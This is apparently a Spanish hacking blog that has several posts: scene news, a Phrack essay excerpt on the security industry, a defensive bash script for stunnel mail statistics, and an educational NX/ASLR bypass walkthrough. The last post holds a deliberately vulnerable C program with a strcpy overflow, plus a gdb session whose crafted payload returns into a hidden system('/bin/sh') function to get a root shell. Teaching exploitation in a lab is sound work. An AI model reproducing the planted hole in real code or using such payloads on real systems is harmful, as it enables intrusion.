Curiosity is insubordination in its purest form. -Vladimir Nabokov

jueves, 28 de agosto de 2014

libro hackstory.es ya disponible

Hola a todos, ya esta disponible el libro Hackstory.es La historia nunca contada del underground hacker en la península Ibérica. Mi enhorabuena a la autora y a todos los demas.

sábado, 5 de abril de 2014

Phrack news

Hola a todos,

La ezine mas respetada en este mundo probablemente sea Phrack.

Pues bien, Phrack cambia a mejor el ritmo de publicacion de contenidos, y el cambio comienza con The Fall of Hacker Groups

Eso es todo, que paseis un buen dia.

domingo, 30 de marzo de 2014

Exploiting para niños [revised]

Hola Exploiters,

Llevo unos dias revisando un documento que llevaba ya demasiado tiempo dormido y este es el resultado.

Se que el enfoque puede parecerle extraño a algunas personas, pero ese es el estilo que he querido darle, y ademas, el titulo del documento me sirve como la excusa perfecta para ponerme a escribir y que mi propia ignorancia no sea un estorbo, sin falsa modestia, todos ignoramos algo.

He intentado que no hubiera cosas incorrectas en el texto. Lo de siempre, cualquier comentario al respecto es bienvenido.

No os cuento nada nuevo si os digo que una vez pasados los 90, el mundo del Exploiting ha estado fuertemente marcado por el eterno juego del gato y el raton y que hasta ahora los Exploiters no han dejado de darle emocion a la carrera y se han mantenido en su sitio siempre desplazando la meta hacia adelante.

Quien sabe si alguien algun dia lograra inmovilizar la meta definitivamente. Por el bien comun de la diversion esperemos que ese dia este muy lejano.

Aunque tal y como estan desarrollandose los acontecimientos en el mundo, cada vez parece menos descabellado pensar que todo va a explotar pronto de todas formas, pero antes de que ocurra vamos a disfrutar, por si acaso, y si al final esto no explota, nos habremos divertido por el camino. Exploiting para niños pues.

Eso es todo por ahora, que paseis un buen dia.

sábado, 24 de agosto de 2013

Elevacion de privilegios en Debian y derivadas



More info: http://unaaldia.hispasec.com/2013/08/elevacion-de-privilegios-en-debian-y.html

martes, 6 de agosto de 2013

Linux Heap Exploiting Revisited



Aupa ahi mr heap!

"lo que vamos a suponer es... que ocurre si nosotros pudieramos controlar el contenido del puntero forward y del puntero backward..."

A partir de ahi la creme de la creme amigo... Keep on rockin' y haxta otra :)

domingo, 16 de junio de 2013

Basic UDP session Hijacking with Scapy

Ask him no questions he'll tell you no lies
That's why a rocker never dies
He's the rocker ♪♪

lunes, 8 de abril de 2013

Happy Hacking

File: archives/68/p68_0x07_Happy Hacking_by_anonymous author.txt ==Phrack Inc.==

Volume 0x0e, Issue 0x44, Phile #0x07 of 0x13

|=-----------------------------------------------------------------------=|
|=-------------------------=[ Happy Hacking ]=---------------------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ by Anonymous ]=---------------------------=|
|=-----------------------------------------------------------------------=|
--[ 3 - The Security Industry

In recent years I've seen how many hackers join the information security industry and many of them having the illusion that hacking as their day job will bring them a great deal of happiness. After a couple of years they discover they no longer enjoy hacking, that those feelings they used to have in the old days are no longer there, and they decide to blame the hacking scene, often condemning it as "being dead".

I'll try to explain this behavior from the science of happiness point of view.

Let me start by looking at Journalism. The science of happiness has shown that people are happy in a profession where:

- "Doing good (high quality work) matches with doing well (achieving wealth and professional advancement) in the field." -

Journalism is one of those careers where doing good (making the world better by promoting democracy and free press) doesn't usually lead to rising as a journalist. Julian Assange, the chief editor of Wikileaks, is a pretty obvious example of this. By firmly believing in free press he has brought upon himself a great deal of trouble. In contrast, being manipulative and exaggerating news often leads to selling more news, which in turn allows for the sales of more ads, which correlates to doing well. But by doing so, journalists have to compromise their beliefs, which ultimately makes their happiness levels go down. Those who decide not to compromise feel angry at their profession when they see those who cheat and compromise rise high. This feeling also leads to their happiness levels to drop. Journalism is therefore one of those professions where its practitioners tend to be the most unhappy.

Hacking on the other hand doesn't suffer from this issue. In the hacking scene doing great work is often recognized and admired. Those hackers that are able to write that exploit thought to be impossible, or find that unbelievably complex vulnerability, are recognized and praised by the community. Also, many hackers tend to develop great tools which are often released as open source. The open source community shares a lot of properties with the hacking community. It is not hard to see why people enjoy developing open source projects so much. Most open source projects are community organizations lead by meritocracy; where the best programmers can quickly escalate the ranks by writing great code. Furthermore, the idea of making the code and the underlying designs widely available gives participants a feeling of fulfillment as they are not doing this for profit but to contribute to a better world. These ideals have also been an integral part of the hacking community where one of its mottos is, "Knowledge should be free, information should be free". Being part of such communities brings a wealth of happiness, and is the reason why these communities flourished without the need for any economic incentives.

Recent years however have brought the security industry closer to the hacking industry. Many hacking scene members have become security industry members once their responsibilities demanded more money (e.g. married with kids and a mortgage). For them it seemed like the right fit and the perfect job was to hack for a living.

However, the security industry does not have the same properties as the hacking or open source communities. The security industry is much more like the journalism industry.

The main difference between the hacking community and the security industry is about the consumers of the security industry. While in the hacking community the consumers are hackers themselves, in the security industry the consumers are companies and other entities that don't have the same behavior as hackers. The behavior of the security industry consumers is similar to the behavior of the consumers of journalism. This is because these companies are partially a subset of the consumers of journalism. These consumers do not judge work as hackers do; instead they are more ignorant and have a different set of criteria to judge work quality.

sábado, 23 de febrero de 2013

Tonel - basic stats&checks for stunnel

Un script que extrae estadisticas de conexiones POP/IMAP tunelizadas a traves de stunnel.

Este script hace tareas primitivas que siempre se repiten de un script a otro: parseo de logs, control de errores, regexps, etc etc asi que si alguien quiere aportar formas mejores de hacer las cosas... oh wait, perl XD es bienvenido.

Sample output HERE

Happy coding!!
#!/bin/bash
# script to get some useful POP/IMAP stats

TMPLOGFILE=$(mktemp -t stunnel.log-$$.$RANDOM)
TMPIPT_LOGFILE=$(mktemp -t iptables.log-$$.$RANDOM)
cleanup() {
  [ -f $TMPLOGFILE ] && rm $TMPLOGFILE
  [ -f $TMPIPT_LOGFILE ] && rm $TMPIPT_LOGFILE
  trap 0
  exit
}
trap cleanup 0 1 2 3 15

warn () {
  echo -e "$@"
}

die() {
  RC=$1 ; shift
  warn "$@"
  exit $RC
}

BANNER="Tonel ~ Basic stats&checks for stunnel / vlan7"
MY_NAME=${0##*/} #ie: tonel.sh
LOGFILE=/var/log/stunnel.log
#ROOT_UID=0
VERBOSE=0
IPT_PREFIX="POP/IMAP FLOOD"
IPT_LOGFILE=/var/log/iptables.log
BANNED_DBFILE=/proc/net/ipt_recent/BANNED
#FLOODERS_DBFILE=/proc/net/ipt_recent/FLOOD

TODAY=$(date +%u)

if [ $TODAY -eq 1 ]
then
# Today is Monday
  BEGIN_DATE="$(date -dmonday-7days +%Y.%m.%d)"
  END_DATE="$(date -dmonday +%Y.%m.%d)"
  WRITE_END_DATE="$(date -dmonday-1day +%Y.%m.%d)"  #dirty hack

  BEGIN_IPT_DATE="$(date -dmonday-7days +"%b %e")"
  END_IPT_DATE="$(date -dmonday +"%b %e")"
  WRITE_END_IPT_DATE="$(date -dmonday-1day +"%b %e")"  #dirty hack
else
  BEGIN_DATE="$(date -dlast-monday-7days +%Y.%m.%d)"
  END_DATE="$(date -dlast-monday +%Y.%m.%d)"
  WRITE_END_DATE="$(date -dlast-monday-1day +%Y.%m.%d)"  #dirty hack

  BEGIN_IPT_DATE="$(date -dlast-monday-7days +"%b %e")"
  END_IPT_DATE="$(date -dlast-monday +"%b %e")"
  WRITE_END_IPT_DATE="$(date -dlast-monday-1day +"%b %e")"  #dirty hack
fi

# Run as root, of course.
#[ "$UID" -eq "$ROOT_UID" ] || die 1 "Bad luck, only root can run this code!"

echo -e "$BANNER"

# Parse arguments
while getopts "vhHf:d:" opt; do
  case $opt in
    v)
      echo -e "\n[+] -v detected. Ok, let's verbose!"
      VERBOSE=1
      ;;
    h)
      echo -e "\n-v verbose output"
      echo -e "\n-f <logfile> specify your stunnel logfile DEFAULT=$LOGFILE"
      echo -e "\n-d <YYYYMMDD+DAYS> (Up to 9999 days) (DEFAULT=one week ago starting last monday)"
      echo -e "\n-h Welcome to help"
      echo -e "\n-H Help: Long description"
      exit
      ;;
    H)
      echo -e "\nEl script acepta varios switches. Esto es la ayuda larga. La ayuda corta es -h"
      echo -e "\nEsta desarrollado de tal forma que sin ningun parametro, calcula estadisticas de toda la semana anterior a la que nos encontramos. Es totalmente transparente al dia actual, sea lunes, jueves, domingo o cualquier dia."
      echo -e "\nEs decir, si estamos en cualquier dia de la semana del 4 al 10-2-2013, asi calcula estadisticas del 28-1-2013 al 3-2-2013, ambos inclusive:"
      echo -e "\n\tbash $MY_NAME"
      echo -e "\nSi necesitamos especificar rangos seria:"
      echo -e "\n\tbash $MY_NAME -d 20130114+15"
      echo -e "\nAsi calcularia desde 20130114 hasta 20130129, ambos inclusive"
      echo -e "\nSi deseamos especificar el archivo de log de stunnel (por defecto $LOGFILE), el script permite que le pasemos el switch -f seguido del archivo de log deseado."
      echo -e "\nSi deseamos mas nivel de Verbose, podemos pasar al script el parametro -v"
      exit
      ;;
    f)
      echo -e "\n[+] -f detected so logfile is now $OPTARG"
      LOGFILE=$OPTARG
      ;;
    d)
      DATE=${OPTARG:0:8}
      INC_OR_DEC=${OPTARG:8:1}
      DAYS=${OPTARG:9:4}

      # Basic parse of -d argument
      # Valid $DATE basic regexp!
      [[ $DATE =~ ^[1-9][0-9][0-9][0-9](0[1-9]|1[012])(0[1-9]|[12][0-9]|3[01]) ]] || die 2 "ERROR! $DATE date detected. Must be YYYYMMDD format! Exiting now..."
      # $INC_OR_DEC Only + implemented
      [ "$INC_OR_DEC" == "+" ] || die 3 "ERROR! $INC_OR_DEC inc_char detected. Must be +"

      BEGIN_DATE="$(date -d $DATE +%Y.%m.%d)"
      END_DATE="$(date -d $DATE$INC_OR_DEC$[ $DAYS + 1 ]"days" +%Y.%m.%d)"
      WRITE_END_DATE="$(date -d $DATE$INC_OR_DEC$DAYS"days" +%Y.%m.%d)"   #dirty hack

      BEGIN_IPT_DATE="$(date -d $DATE +"%b %e")"
      END_IPT_DATE="$(date -d $DATE$INC_OR_DEC$[ $DAYS + 1 ]"days" +"%b %e")"
      WRITE_END_IPT_DATE="$(date -d $DATE$INC_OR_DEC$DAYS"days" +"%b %e")"  #dirty hack

# DEBUG line-
#     echo "#DATE#$DATE#INC_ORD_DEC#$INC_OR_DEC#DAYS#$DAYS#BEGIN_DATE#$BEGIN_DATE#END_DATE#$END_DATE#WRITE_END_DATE#$WRITE_END_DATE#BEGIN_IPT_DATE#$BEGIN_IPT_DATE#END_IPT_DATE#$END_IPT_DATE#WRITE_END_IPT_DATE#$WRITE_END_IPT_DATE<<EOL"
      echo -e "\n[+] -d detected so date range is now\n\t[from $BEGIN_DATE to $WRITE_END_DATE]"
      ;;
  esac
done

[ -f "$LOGFILE" ] && echo -e "\n[+] Log $LOGFILE starts on $(head -n 1 $LOGFILE |cut -d" " -f1,2)"
[ -f "$IPT_LOGFILE" ] && echo -e "\n[+] Log $IPT_LOGFILE starts on $(head -n 1 $IPT_LOGFILE |awk '{print $1,$2,$3}')"

echo -e "\n\t\t\t[+] [+] Now running some basic checks..."
echo -e "\t\t\t======================================"
echo -e "\n[+] Checking runnin' stunnel processes..."
ps -ef |grep [s]tunnel |grep -v $MY_NAME || die 4 "ERROR! stunnel is NOT running! Exiting now..."
echo -e "\n\t[OK!] Let's continue..."

echo -e "\n[+] Checking stunnel LISTEN sockets..."
##netstat -tnl |grep LISTEN |egrep ':110|:143|:993|:995'
##lsof -iTCP:143 -iTCP:110 -iTCP:993 -iTCP:995
lsof -iTCP:143 |grep LISTEN || die 5 "ERROR! IMAP is NOT listening! Exiting now..."
lsof -iTCP:110 |grep LISTEN || die 6 "ERROR! POP3 is NOT listening! Exiting now..."
lsof -iTCP:993 |grep LISTEN || die 7 "ERROR! IMAPS is NOT listening! Exiting now..."
lsof -iTCP:995 |grep LISTEN || die 8 "ERROR! POP3S is NOT listening! Exiting now..."

echo -e "\n\t[OK!] Let's continue..."

echo -e "\n\t\t\t[+] [+] Now parsing logfile [$LOGFILE] ..."
echo -e "\t\t\t==========================================="
[ -f "$LOGFILE" ] || die 9 "Fatal ERROR! log $LOGFILE NOT found. Exiting now..."

#BUFFER=$(awk '{ if ( $0 > "'"$BEGIN_DATE"'" && $0 < "'"$END_DATE"'" ) print $0 }' $LOGFILE)
#echo "$BUFFER"  # note the "" to respect \n chars

awk '{ if ( $0 > "'"$BEGIN_DATE"'" && $0 < "'"$END_DATE"'" ) print $0 }' $LOGFILE >$TMPLOGFILE
OUTTAGES=$(egrep -oc "Received signal| stunnel " $TMPLOGFILE)
echo -e "\n[+] stunnel outtages [from $BEGIN_DATE to $WRITE_END_DATE]: [$OUTTAGES]"
[ $OUTTAGES -ne 0 ] && [ $VERBOSE -ne 0 ] && echo -e "\t[+] Daemon stops:\n\t\t$(grep "Received signal" $TMPLOGFILE)"
[ $OUTTAGES -ne 0 ] && [ $VERBOSE -ne 0 ] && echo -e "\t[+] Daemon starts:\n\t\t$(grep " stunnel " $TMPLOGFILE)"

core() {
  echo -e "\n[+] Numero conexiones $1 OK / IP origen: [from $BEGIN_DATE to $WRITE_END_DATE]"
  CORE_TOTAL=$(grep -c "$1 connected from" $TMPLOGFILE)
  [ $CORE_TOTAL -ne 0 ] && grep "$1 connected from" $TMPLOGFILE |cut -d" " -f7 |cut -d":" -f1 |sort |uniq -c |sort -rn |sed -e 's/^[ ]*//' |awk '{print NR, $0}' |tr ' ' \\t
  echo -e "\n\t[+] Total conexiones: [$CORE_TOTAL]"
  [ $CORE_TOTAL -ne 0 ] && [ $VERBOSE -ne 0 ] && echo -e "\t[+] Primera conexion:\n\t\t$(grep "$1 connected from" $TMPLOGFILE |head -n 1 |cut -d" " -f1,2,4-7)"
  [ $CORE_TOTAL -ne 0 ] && echo -e "\t[+] Ultima conexion:\n\t\t$(grep "$1 connected from" $TMPLOGFILE |tail -n 1 |cut -d" " -f1,2,4-7)"
}

CONNS_TOTAL=0
core "IMAP" ; CONNS_TOTAL=$(($CONNS_TOTAL+$CORE_TOTAL))
core "POP3" ; CONNS_TOTAL=$(($CONNS_TOTAL+$CORE_TOTAL))
core "IMAPS" ; CONNS_TOTAL=$(($CONNS_TOTAL+$CORE_TOTAL))
core "POP3S" ; CONNS_TOTAL=$(($CONNS_TOTAL+$CORE_TOTAL))
echo -e "\n[+] Total conexiones (IMAP && POP3 && IMAPS && POP3S): [$CONNS_TOTAL]"

echo -e "\n\t\t\t[+] [+] Now checking bad guys..."
echo -e "\t\t\t===================================="

# Code below relays on Wietse's TCP-Wrappers
echo -e "\n[+] NO autorizados: Conexiones rechazadas / IP origen [from $BEGIN_DATE to $WRITE_END_DATE]"
REFUSED_TOTAL=$(grep -c "REFUSED" $TMPLOGFILE)
[ $REFUSED_TOTAL -ne 0 ] && grep REFUSED $TMPLOGFILE |cut -d" " -f6 |cut -d":" -f1 |sort |uniq -c |sort -rn |sed -e 's/^[ ]*//' |awk '{print NR, $0}' |tr ' ' \\t
echo -e "\n\t[+] Total conexiones rechazadas (NO autorizados): [$REFUSED_TOTAL]\n"

# Code below relays on some anti-DoS custom iptables rules
echo -e "\n[+] POP/IMAP FLOODERS: Conexiones rechazadas / IP origen [from $BEGIN_IPT_DATE to $WRITE_END_IPT_DATE]"
[ -f $IPT_LOGFILE ] || warn "[!] WARNING! $IPT_LOGFILE NOT found! Skipping this test and continuing anyway..."
[ -f $IPT_LOGFILE ] && awk '{ if ( $0 > "'"$BEGIN_IPT_DATE"'" && $0 < "'"$END_IPT_DATE"'" ) print $0 }' $IPT_LOGFILE >$TMPIPT_LOGFILE
[ -f $IPT_LOGFILE ] && FLOODERS_TOTAL=$(grep -c "$IPT_PREFIX" $TMPIPT_LOGFILE)
[ -f $IPT_LOGFILE ] && [ $FLOODERS_TOTAL -ne 0 ] && grep "$IPT_PREFIX" $TMPIPT_LOGFILE |grep -Eo "SRC=[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}" |cut -d= -f2 |sort |uniq -c |sort -rn |sed -e 's/^[ ]*//' |awk '{print NR, $0}' |tr ' ' \\t
echo -e "\n\t[+] Total conexiones rechazadas (FLOODERS): [$FLOODERS_TOTAL]\n"

echo -e "\n[+] FLOODERS actualmente BANEADOS [dbfile $BANNED_DBFILE]"
[ -f $BANNED_DBFILE ] || warn "[!] WARNING! $BANNED_DBFILE NOT found! Skipping this test and continuing anyway..."
[ -f $BANNED_DBFILE ] && BANNED_TOTAL=$(cat $BANNED_DBFILE |wc -l)
[ -f $BANNED_DBFILE ] && [ $BANNED_TOTAL -ne 0 ] && cut -d" " -f1 $BANNED_DBFILE |cut -d= -f2
echo -e "\n\t[+] Total IPs actualmente BANEADAS: [$BANNED_TOTAL]\n"

PATH_TO_ME=${0}
FULL_ARGS=${@}
echo -e "\nLast run on $(hostname) at $(date) with\n$PATH_TO_ME $FULL_ARGS\nNow exiting - Have a nice day...\n"
[ $VERBOSE -eq 0 ] && echo -e "Do you wanna verbose output? just rerun me with -v switch!\n"

exit 0

martes, 5 de febrero de 2013

Publicada lista de ponentes RootedCON 2013

Sábado 9 de marzo
16:30 - 17:20 Albert López
Linux Heap Exploiting Revisited

et al.

Ponencias y ponentes.

We're all pioneers. And we're all surrounded by heroes -Joe Barr

sábado, 26 de enero de 2013

Ventanas con Grupo de delitos telemáticos de la Guardia Civil

Entrevista en la radio al GDT muy decente para conocerlos un poco mejor.

martes, 22 de enero de 2013

NX/ASLR linux/x64 bypass

Hola Exploiters,

Llevaba un tiempo queriendo escribir sobre como un overflow puede permitirnos (with no shellcodes!) movernos por los flujos del codigo de un programa (previstos o no), y tras leer esta excelente entrada sobre ROP me anime al fin.

Tratar ROP se escapa de mi idea original, asi que aqui van cosas como que NX no afecta si queremos desviar el flujo del programa hacia por ejemplo una funcion perteneciente al propio programa a explotar, que podemos llegar a ejecutar partes del programa que no deberiamos (password incorrecto? no problem, just let me in anyway).

Es una explotacion en un sistema Linux de 64 bits con kernel reciente blablabla y como veis existen condiciones en las que ASLR no afecta para nada (no infoleaks needed, no bruteforce needed... como si no existiera). A disfrutar.
### Some versions
root@bt:~# uname -a
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux

### 64 bits S.O.
root@bt:~# getconf LONG_BIT
64

### Full ASLR
root@bt:~# cat /proc/sys/kernel/randomize_va_space 
2

### ASLR + NX
root@bt:~# bash checksec.sh --file vuln
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   vuln

### Code
root@bt:~# cat vuln.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
// gcc -o vuln vuln.c -fno-stack-protector -mpreferred-stack-boundary=4  #4 is min on x64
 
void nunca_se_ejecuta()
/* NUNCA SE LLAMA A ESTA FUNCION EN EL CODIGO */
/* call me if you can */
{
 system("/bin/sh");
 printf("SIGSEGV");
}
 
void vuln(char *buff)
{
 char tmp[8] = {'\0'};
 
 strcpy(tmp, buff);
 printf("-> %sn", tmp);
}
 
int main(int argc, char *argv[])
{
 if(argc != 2) {
  printf("%s <arg>n", argv[0]);
  exit(0);
 }
 printf("exploit me if you can");
 
 vuln(argv[1]);
 return 0;
}

### No SSP. Min preferred stack boundary on x64 is 4 bytes
root@bt:~# gcc -o vuln vuln.c -fno-stack-protector -mpreferred-stack-boundary=4

### Okay, let's GDB rocks:
root@bt:~# gdb -q vuln
Reading symbols from /root/vuln...(no debugging symbols found)...done.
(gdb) r `perl -e 'print "123456789012345678901234AAAA"'`
Starting program: /root/vuln `perl -e 'print "123456789012345678901234AAAA"'`

Program received signal SIGSEGV, Segmentation fault.
0x0000000041414141 in ?? ()

### The Segmentation fault is what we wanted to see. Let's disasm our target func
(gdb) disas nunca_se_ejecuta
Dump of assembler code for function nunca_se_ejecuta:
   0x0000000000400604 <+0>: push   %rbp
   0x0000000000400605 <+1>: mov    %rsp,%rbp
   0x0000000000400608 <+4>: mov    $0x4007c0,%edi
   0x000000000040060d <+9>: callq  0x4004f8 <system@plt>
   0x0000000000400612 <+14>: mov    $0x4007c8,%eax
   0x0000000000400617 <+19>: mov    %rax,%rdi
   0x000000000040061a <+22>: mov    $0x0,%eax
   0x000000000040061f <+27>: callq  0x4004c8 <printf@plt>
   0x0000000000400624 <+32>: leaveq 
   0x0000000000400625 <+33>: retq   
End of assembler dump.

### Si queremos entrar a la funcion que nunca se llama, podemos saltar aqui:
0x0000000000400608 <+4>: mov    $0x4007c0,%edi
¿Muchos NULLs? No problem, podemos llegar a esa direccion de memoria en direccionamiento 64 bits saltando a 0x00400608. ¿Aun hay un byte nulo que abortaria el programa? tsetse, little-endian al rescate:
(gdb) r `perl -e 'print "123456789012345678901234\x08\x06\x40\x00"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /root/vuln `perl -e 'print "123456789012345678901234\x08\x06\x40\x00"'`
sh-4.1# whoami
root
:)
sh-4.1# exit

Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe4a8 in ?? ()

## bye
(gdb) q
A debugging session is active.

 Inferior 1 [process 20741] will be killed.

Quit anyway? (y or n) y
root@bt:~#
Probado en un kernel 4.1.7-grsec , system() sigue devolviendonos una shell, y una vez salimos de la shell, cuando retornamos de la funcion, PaX mata el programa explotado.

Have fun-